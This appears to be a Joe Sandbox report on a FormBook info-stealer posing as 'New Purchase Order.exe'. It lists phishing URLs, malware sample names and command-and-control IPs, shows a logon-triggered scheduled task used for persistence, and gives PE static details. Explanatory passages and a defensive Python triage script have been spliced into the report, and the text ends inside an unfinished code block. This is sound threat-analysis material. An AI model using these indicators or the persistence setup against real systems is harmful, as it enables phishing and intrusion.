www.complexity.pub | Tender_24910.exe | malicious | FormBook | 217.160.0.127
www.complexity.pub | Atlas Copco- WEPCO.exe | malicious | FormBook | 217.160.0.127
www.complexity.pub | SecuriteInfo.com.Trojan.AutoIt.1430.6102.4229.exe | malicious | FormBook | 217.160.0.127
dns.ladipage.com | Shipping report#Cargo Handling.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | PO76389.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | SHIPPING DOC MBL+HBL.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | r3T-ENQ-O-2024-10856.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | SecuriteInfo.com.Win32.Malware-gen.24953.22588.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | 3T-ENQ-O-2024-10856.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | New Purchase Order.exe | malicious | FormBook | 54.179.173.60
dns.ladipage.com | Scan 00093847.exe | malicious | FormBook | 18.139.62.226
dns.ladipage.com | z11SOAAUG2408.exe | malicious | FormBook | 13.228.81.39
dns.ladipage.com | REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | 13.228.81.39
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AMAZON-02US | https://havannahboathouse.com/ | malicious | Unknown | 13.33.187.70
AMAZON-02US | good.elf | malicious | Unknown | 54.171.230.55
AMAZON-02US | https://securcomau.gurucan.com/66e8e67dd77b5900129b4800 | malicious | Unknown | 18.244.18.37
AMAZON-02US | https://securcomau.gurucan.com/66e8e67dd77b5900129b4800 | malicious | HTMLPhisher | 44.236.63.210
AMAZON-02US | https://ubenuziqwvnbxsldhlsslykrxxvcdkulinktml.s3.us-west-1.amazonaws.com/vretyyddkfkfkfkf.html | malicious | HTMLPhisher | 52.219.220.218
AMAZON-02US | https://www-documentsfiles-filled.s3.us-west-1.amazonaws.com/refrrence890345/settlements/QUFNa0FEQmxZMlE1TnpnMExUQTROV1l0TkRVM1lTMWlPR0V6TFdNeFlXWmtPVFEyWWpWaFlRQkdBQUFBQUFBbEl1MDJGRFVUUTZZV2hVeEtkUFIwQndEd2c3Q1hKNkVLUXJxSEZKR/indexx.html | malicious | Unknown | 52.219.116.177
AMAZON-02US | https://829027.showcasespark.co/?ownid=nlx.fhz_468424&enparms2=9989%2C2099703%2C3941548%2C9940%2C10395%2C465939%2C10150%2C0%2C0%2C9944%2C0%2C2096498%2C829027%2C222081%2C116635312759%2C196039392%2Cnlx.fhz&u_agnt=a565ccc5e7018c4ec7bec64e38db2966&skter=bgrhivermf%20vmroml%2Chfhz%20fhz%2Collsxh%2Bvmroml%2Cmlrgzxfwv%2Bvmroml%2Cbgrhivermf%2Bvmroml&czero=-1&cstate=hzcvg&skwdb=MLI&ccntry=HF&cctid=109&chsh=217b8667beee6c353eae913709720626&rn=304033711370&cf=8&dlt=0&da=353807&pbi=0&cq=-1&exids=&frdto=829027 | malicious | Unknown | 13.32.99.105
AMAZON-02US | http://glydesolar.com | malicious | Unknown | 76.76.21.98
AMAZON-02US | https://meetmsklogi.webflow.io/ | malicious | HTMLPhisher | 18.245.246.158
AMAZON-02US | https://metamaskksloggiinn.webflow.io/ | malicious | Unknown | 52.222.232.47
THORDC-ASIS | New Purchase Order.exe | malicious | FormBook | 82.221.128.183
THORDC-ASIS | Scan 00093847.exe | malicious | FormBook | 82.221.128.183
THORDC-ASIS | REQUEST FOR QUOTATION.exe | malicious | FormBook, GuLoader | 82.221.128.183
THORDC-ASIS | botx.x86.elf | malicious | Mirai | 82.221.214.240
THORDC-ASIS | waybill_shipping_documents_original_BL_CI&PL_29_07_2024_000000002024_doc.xls | malicious | GuLoader, Remcos | 192.253.251.227
THORDC-ASIS | msi.dll.dll | malicious | Unknown | 82.221.129.24
THORDC-ASIS | 4Y26u3rWN6.rtf | malicious | GuLoader, Remcos | 192.253.251.227
THORDC-ASIS | waybill_shipping_documents_original_BL_CI&PL_29_07_2024_00000000_doc.xls | malicious | Remcos | 192.253.251.227
THORDC-ASIS | createdthingstobefrankwithmeeverywhere.gIF.vbs | malicious | GuLoader, Remcos | 192.253.251.227
THORDC-ASIS | 17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b6609347235811.dat-decoded.exe | malicious | GuLoader, Remcos | 192.253.251.227
ACPCA | invoice.exe | malicious | FormBook | 162.0.213.94
ACPCA | 809768765454654.exe | malicious | FormBook | 162.0.213.72
ACPCA | is homemade pepper spray legal uk 42639.js | malicious | GookitLoader | 162.55.208.83
ACPCA | r9856_7.exe | malicious | FormBook | 162.0.213.94
ACPCA | 8097600987765.exe | malicious | FormBook | 162.0.213.72
ACPCA | PO#86637.exe | malicious | FormBook | 162.0.213.94
ACPCA | QOaboeP8al.exe | malicious | DarkCloud | 162.55.60.2
ACPCA | Request for Quotataion.exe | malicious | DarkCloud | 162.55.60.2
ACPCA | New Purchase Order.exe | malicious | FormBook | 162.0.213.94
ACPCA | Scan 00093847.exe | malicious | FormBook | 162.0.213.94
ONEANDONE-ASBrauerstrasse48DE | Petronas request for-quotation.exe | malicious | FormBook | 74.208.236.183
ONEANDONE-ASBrauerstrasse48DE | https://www.waigroup.com.au/ | malicious | Unknown | 74.208.236.252
ONEANDONE-ASBrauerstrasse48DE | http://infofunctionboard.autos/ | malicious | Unknown | 212.227.67.33
ONEANDONE-ASBrauerstrasse48DE | https://digitalentreprise.fr/ | malicious | Unknown | 217.160.0.18
ONEANDONE-ASBrauerstrasse48DE | https://redir.digitalentreprise.fr/c/119/7758047/12090/0/618830313/240782/415830/509330dacc.html | malicious | Unknown | 217.160.0.18
ONEANDONE-ASBrauerstrasse48DE | is homemade pepper spray legal uk 42639.js | malicious | GookitLoader | 217.160.0.67
ONEANDONE-ASBrauerstrasse48DE | New Purchase Order.exe | malicious | FormBook | 217.160.0.231
ONEANDONE-ASBrauerstrasse48DE | Purchase order.exe | malicious | FormBook | 217.76.156.252
ONEANDONE-ASBrauerstrasse48DE | Rechnung_2024-09-03_100148163067_V21648588.html | malicious | Unknown | 213.165.66.58
ONEANDONE-ASBrauerstrasse48DE | mlnZfOifRX.elf | malicious | Okiru | 82.223.232.182
              Process:C:\Users\user\Desktop\New Purchase Order.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1216
              Entropy (8bit):5.34331486778365
              Encrypted:false
              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
              MD5:1330C80CAAC9A0FB172F202485E9B1E8
              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
              Malicious:true
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
              Process:C:\Users\user\AppData\Roaming\hbaiQWstL.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):1216
              Entropy (8bit):5.34331486778365
              Encrypted:false
              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
              MD5:1330C80CAAC9A0FB172F202485E9B1E8
              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
              Malicious:false
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:data
              Category:dropped
              Size (bytes):2232
              Entropy (8bit):5.380805901110357
              Encrypted:false
              SSDEEP:48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//Zf0Uyus:lGLHxvCsIfA2KRHmOugo1s
              MD5:5F0D346111304642BD6E3112D4031BA6
              SHA1:0141E3AAE28617B7F350C1FAA1DDA3F030724A95
              SHA-256:B8FC7BFEDD729A8BF385F9BF90A47B5F60C03CDA9FD02DE219362EB373292EBD
              SHA-512:8041A71256BCFA84E950D5E1C36419A75939AE350997712DB037F880411EB0763C49FD72A78A74759AFE4A310BB0F2B2E030D84391F3134C4029D435161A3E5F
              Malicious:false
              Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
              Process:C:\Windows\SysWOW64\setupugc.exe
              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
              Category:dropped
              Size (bytes):196608
              Entropy (8bit):1.1239949490932863
              Encrypted:false
              SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
              MD5:271D5F995996735B01672CF227C81C17
              SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
              SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
              SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
              Malicious:false
              Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              File Type:ASCII text, with no line terminators
              Category:dropped
              Size (bytes):60
              Entropy (8bit):4.038920595031593
              Encrypted:false
              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
              MD5:D17FE0A3F47BE24A6453E9EF58C94641
              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
              Malicious:false
              Preview:# PowerShell test file to determine AppLocker lockdown mode
(The same 60-byte file, with identical hashes, was dropped seven more times by powershell.exe; those entries repeat the one above verbatim and are omitted here. The content is PowerShell's own start-up probe for AppLocker script enforcement, so these drops show only that powershell.exe was launched, not what it executed.)
              Process:C:\Users\user\Desktop\New Purchase Order.exe
              File Type:XML 1.0 document, ASCII text
              Category:dropped
              Size (bytes):1596
              Entropy (8bit):5.092926961640879
              Encrypted:false
              SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLHxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTFv
              MD5:EEABCDA39BEA20CB5CB38B5730387CA3
              SHA1:B355DA24FE85166FD260C6A3A7F544D1D3FFFCCA
              SHA-256:C4FF35F9E6C0D013569A74C7EDF551815EE52950F86C973E765D7A27A5FF199E
              SHA-512:22FE4F5CF72AFFE152780B62E5EF0C00C5AC3F623F77040AA648E6DC2A257C17114588FFE89D3DD201188FFAF26D4EFF251505944D52F932E1CD3FA0D15B1253
              Malicious:true
              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
              Process:C:\Users\user\AppData\Roaming\hbaiQWstL.exe
              File Type:XML 1.0 document, ASCII text
              Category:dropped
              Size (bytes):1596
              Entropy (8bit):5.092926961640879
              Encrypted:false
              SSDEEP:24:2di4+S2qhHb1eHky1mIHdUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtLHxvn:cge7QYrFdOFzOzN33ODOiDdKrsuTFv
              MD5:EEABCDA39BEA20CB5CB38B5730387CA3
              SHA1:B355DA24FE85166FD260C6A3A7F544D1D3FFFCCA
              SHA-256:C4FF35F9E6C0D013569A74C7EDF551815EE52950F86C973E765D7A27A5FF199E
              SHA-512:22FE4F5CF72AFFE152780B62E5EF0C00C5AC3F623F77040AA648E6DC2A257C17114588FFE89D3DD201188FFAF26D4EFF251505944D52F932E1CD3FA0D15B1253
              Malicious:false
              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <Run
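The dropped task definition above declares UTF-16 in its XML header while the report's file type shows it is plain ASCII, and its preview ends before the Actions element. The Python below is an added example, not part of the Joe Sandbox report: it decodes a task XML file by its byte-order mark rather than by its declaration, then flags the combination this report documents, a LogonTrigger task whose Exec command points into a user-writable directory. Both XML documents in the block are constructed; the first mirrors the visible fields of the dropped file and assumes, from the timeline entry for the task hbaiQWstL, that its action is C:\Users\user\AppData\Roaming\hbaiQWstL.exe, which the preview does not show. The list of user-writable directories is an assumption as well.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed task definition modelled on the dropped XML shown in the report.
# The report's preview stops before <Actions>; the Exec command used here is
# the path the timeline records for the registered task hbaiQWstL (assumption).
# Like the dropped file, it is ASCII while its declaration claims UTF-16.
SAMPLE_TASK_XML = b"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2014-10-25T14:27:44.8929027</Date>
    <Author>user-PC\\user</Author>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Enabled>true</Enabled>
      <UserId>user-PC\\user</UserId>
    </LogonTrigger>
    <RegistrationTrigger>
      <Enabled>false</Enabled>
    </RegistrationTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>user-PC\\user</UserId>
      <LogonType>InteractiveToken</LogonType>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\\Users\\user\\AppData\\Roaming\\hbaiQWstL.exe</Command>
    </Exec>
  </Actions>
</Task>"""

# Constructed benign comparison: also logon-triggered, but the binary lives
# under Program Files rather than in a directory the user can write to.
BENIGN_TASK_XML = b"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Principals><Principal id="Author"><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
  <Actions Context="Author"><Exec><Command>C:\\Program Files\\Vendor\\updater.exe</Command></Exec></Actions>
</Task>"""

XML_DECL_RE = re.compile(r"^\s*<\?xml[^>]*\?>")
# Assumption: the directories an unprivileged user can write to on a default install.
USER_WRITABLE_RE = re.compile(
    r"\\(AppData\\(Roaming|Local)|Users\\Public|ProgramData|Windows\\Temp|Temp)\\",
    re.IGNORECASE)


def load_task(raw: bytes) -> ET.Element:
    """Parse Task Scheduler XML whose declared encoding may not match its bytes.
    Trust the byte-order mark, not the declaration, then strip the declaration
    so the parser cannot re-apply the wrong encoding."""
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = raw.decode("utf-16")
    else:
        text = raw.decode("utf-8")
    return ET.fromstring(XML_DECL_RE.sub("", text, count=1).lstrip())


def triage_task(root: ET.Element) -> dict:
    """Pull the fields that matter for persistence triage and flag the
    combination this report shows: a logon-triggered task whose action runs
    from a user-writable directory."""
    enabled = root.findtext("t:Triggers/t:LogonTrigger/t:Enabled", default="", namespaces=NS)
    logon = enabled.strip().lower() == "true"
    command = root.findtext("t:Actions/t:Exec/t:Command", default="", namespaces=NS)
    run_level = root.findtext("t:Principals/t:Principal/t:RunLevel", default="", namespaces=NS)
    hard_terminate = root.findtext("t:Settings/t:AllowHardTerminate", default="", namespaces=NS)
    user_writable = bool(USER_WRITABLE_RE.search(command))
    findings = []
    if logon:
        findings.append("runs at every logon")
    if user_writable:
        findings.append("action lives in a user-writable directory")
    if hard_terminate.strip().lower() == "false":
        findings.append("AllowHardTerminate=false")
    return {"command": command, "logon_trigger": logon, "run_level": run_level,
            "findings": findings, "suspicious": logon and user_writable}


if __name__ == "__main__":
    for label, blob in (("dropped-style task", SAMPLE_TASK_XML), ("benign task", BENIGN_TASK_XML)):
        print(label, triage_task(load_task(blob)))
```

Fed the bytes of an exported task (schtasks /Query /XML, or the file under C:\Windows\System32\Tasks), load_task tolerates the ASCII-with-UTF-16-declaration mismatch that a naive ET.parse on the raw file can trip over, and triage_task reports the task as suspicious only when both the logon trigger and the user-writable path are present; RunLevel LeastPrivilege, as here, means the task runs as the user and is not a privilege-escalation indicator.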
              Process:C:\Users\user\Desktop\New Purchase Order.exe
              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Category:dropped
              Size (bytes):733696
              Entropy (8bit):7.857574491479369
              Encrypted:false
              SSDEEP:12288:NVYEZ6MDir5xlYeurNrB2bUyH8sETibdXEBYqLy+Z2WY13yxMWZIzM:POr5EeM16zcsAibaj7Yiqtz
              MD5:E392C45451247441D1763095DB3CD57A
              SHA1:F37255D99C5BFF5C1E60209D7AFEE3445E277E6D
              SHA-256:7616904DB54D77CB25CC58F279BFDF6EF5CBABE19573CBD781238BE01DAAA1C4
              SHA-512:DBC0C09885BDA8042402BD09A307541F8DB4AF27ACCAC03268C1E7C08ABD35984AA570AC2900C6369357B42E7F28E39E1DE7795BA33C2813384A4C370635A06E
              Malicious:true
              Antivirus:
              • Antivirus: Avira, Detection: 100%
              • Antivirus: Joe Sandbox ML, Detection: 100%
              • Antivirus: ReversingLabs, Detection: 29%
              • Antivirus: Virustotal, Detection: 33%, Browse
              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.f..............0.............j0... ...@....@.. ....................................@..................................0..O....@..L....................`....................................................... ............... ..H............text...p.... ...................... ..`.rsrc...L....@......................@..@.reloc.......`.......0..............@..B................L0......H........D...a..........p.................................................{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*..{....*"..}....*".(.....*...0............}......}.....sf...%.oU....%r...poS....%.oW....%r...poO....% ....oQ....%.oY....%r...po[....}......}......}.....(.......(/....*..0............sg...}.....s....}.....
              Process:C:\Users\user\Desktop\New Purchase Order.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):26
              Entropy (8bit):3.95006375643621
              Encrypted:false
              SSDEEP:3:ggPYV:rPYV
              MD5:187F488E27DB4AF347237FE461A079AD
              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
              Malicious:true
              Preview:[ZoneTransfer]....ZoneId=0
              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
              Entropy (8bit):7.857574491479369
              TrID:
              • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
              • Win32 Executable (generic) a (10002005/4) 49.78%
              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
              • Generic Win/DOS Executable (2004/3) 0.01%
              • DOS Executable Generic (2002/1) 0.01%
              File name:New Purchase Order.exe
              File size:733'696 bytes
              MD5:e392c45451247441d1763095db3cd57a
              SHA1:f37255d99c5bff5c1e60209d7afee3445e277e6d
              SHA256:7616904db54d77cb25cc58f279bfdf6ef5cbabe19573cbd781238be01daaa1c4
              SHA512:dbc0c09885bda8042402bd09a307541f8db4af27accac03268c1e7c08abd35984aa570ac2900c6369357b42e7f28e39e1de7795ba33c2813384a4c370635a06e
              SSDEEP:12288:NVYEZ6MDir5xlYeurNrB2bUyH8sETibdXEBYqLy+Z2WY13yxMWZIzM:POr5EeM16zcsAibaj7Yiqtz
              TLSH:1BF4017123F4DD29C2B90334A431E33999255E9BE239C162FBDE7D97BF2AB015527202
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....&.f..............0.............j0... ...@....@.. ....................................@................................
              Icon Hash:a5b3b38589b08045
              Entrypoint:0x4b306a
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x66EA2692 [Wed Sep 18 01:02:10 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
              Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
(the line above is repeated 97 times in the report: 00 00 decodes as add byte ptr [eax], al, i.e. the zero bytes that follow the six-byte entry stub at the end of .text)
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb3018 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb4000 | 0x1a4c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xb6000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xb1070 | 0xb1200 | f3b7e2f56b9e6ab2b96d5ecaaf94a7cd | False | 0.9035015658080452 | data | 7.866114778015551 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xb4000 | 0x1a4c | 0x1c00 | 9e5d526c522ad987359bee895a05fc6d | False | 0.8000837053571429 | data | 7.035963466638725 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xb6000 | 0xc | 0x200 | 7f801ca94e9baf1577dc3573932ba129 | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xb4100 | 0x13f1 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.9729676787463272
RT_GROUP_ICON | 0xb5504 | 0x14 | data | | | 1.05
RT_VERSION | 0xb5528 | 0x324 | data | | | 0.4291044776119403
RT_MANIFEST | 0xb585c | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347
DLL | Import
mscoree.dll | _CorExeMain
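The static fields above fit together in one way: the entry point 0x4b306a is the last six bytes of .text (0x2000 + 0xb1070 = 0xb3070 = 0x4b306a - 0x400000 + 6), the single disassembled instruction jumps through address 0x402000, which is the IAT (RVA 0x2000, 8 bytes: one PE32 thunk plus the null terminator), and the only import is mscoree.dll!_CorExeMain. That is the standard native stub of a managed executable; the program logic is CIL reached through the CLI header at IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (0x2008), and the 7.87 entropy of .text is consistent with a packed or encrypted payload sitting there. The following added example, not part of the report, shows how those relationships are derived from the fields alone. The stub bytes are reconstructed from the disassembly line (FF 25 disp32 is the encoding of an absolute indirect jmp); every other value is copied from the tables above.

```python
import struct

# Values copied from the report's static analysis of New Purchase Order.exe.
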